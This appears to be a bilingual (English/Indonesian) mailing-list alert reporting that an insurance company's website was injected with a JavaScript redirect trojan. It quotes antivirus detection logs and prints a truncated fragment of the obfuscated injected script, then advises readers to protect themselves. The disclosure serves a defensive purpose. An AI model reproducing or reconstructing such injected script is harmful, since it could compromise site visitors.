Dear All Member, This morning i got information from my friend that xxx.axa.co.id was injected with JS:Illredir-CB [Trj].
>From avast! antivirus found : avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/DropDownMenuX.js"; is infected by "JS:Illredir-CB [Trj]" virus. "%3" task used Version of current VPS file is 100607-2, 06/08/2010 avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/ie5.js"; is infected by "JS:Illredir-CB [Trj]" virus. "%3" task used Version of current VPS file is 100607-2, 06/08/2010 avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/"; is infected by "JS:Illredir-CB [Trj]" virus. "%3" task used Version of current VPS file is 100607-2, 06/08/2010 And from Unmask Website Tool for analysis we found that there is a script injected at this website : try {var q='cV'} catch(q){};y=["Oc","RI","S"];K=11139;K-=208;var I;o=function(){VD=[];n=31057;n-=35... Summary report : http://www.unmaskparasites.com/security-report/ Please protect yourselves with strongest AV client, and avoid to access your private financial services at unknown machines which is can harmful to yourself. Dear Member, Pagi ini saya mendapatkan informasi dari rekan saya bahwa untuk website xxx.axa.co.id telah di injeksi oleh sejenis trojan bernama JS:Illredir-CB [Trj. Dari hasil deteksi avast! antivirus ditemukan: avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/DropDownMenuX.js"; is infected by "JS:Illredir-CB [Trj]" virus. "%3" task used Version of current VPS file is 100607-2, 06/08/2010 avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/ie5.js"; is infected by "JS:Illredir-CB [Trj]" virus. "%3" task used Version of current VPS file is 100607-2, 06/08/2010 avast! [YANTOCHIANG-PC]: File "http://www.axa.co.id/"; is infected by "JS:Illredir-CB [Trj]" virus. "%3" task used Version of current VPS file is 100607-2, 06/08/2010 Sedangkan dari salah satu hasil analisa website ditemukan adanya script yang diinjeksi pada website ini : try {var q='cV'} catch(q){};y=["Oc","RI","S"];K=11139;K-=208;var I;o=function(){VD=[];n=31057;n-=35... Ringkasan laporan : http://www.unmaskparasites.com/security-report/ Mohon untuk proteksi diri Anda dengan klien AV yang cukup handal, dan hindari untuk melakukan akses yang berhubungan dengan keuangan pada mesin yang tidak Anda kenal karena dapat membahayakan diri Anda sendiri. Thanks and Regards, Yanto Chiang [Non-text portions of this message have been removed]
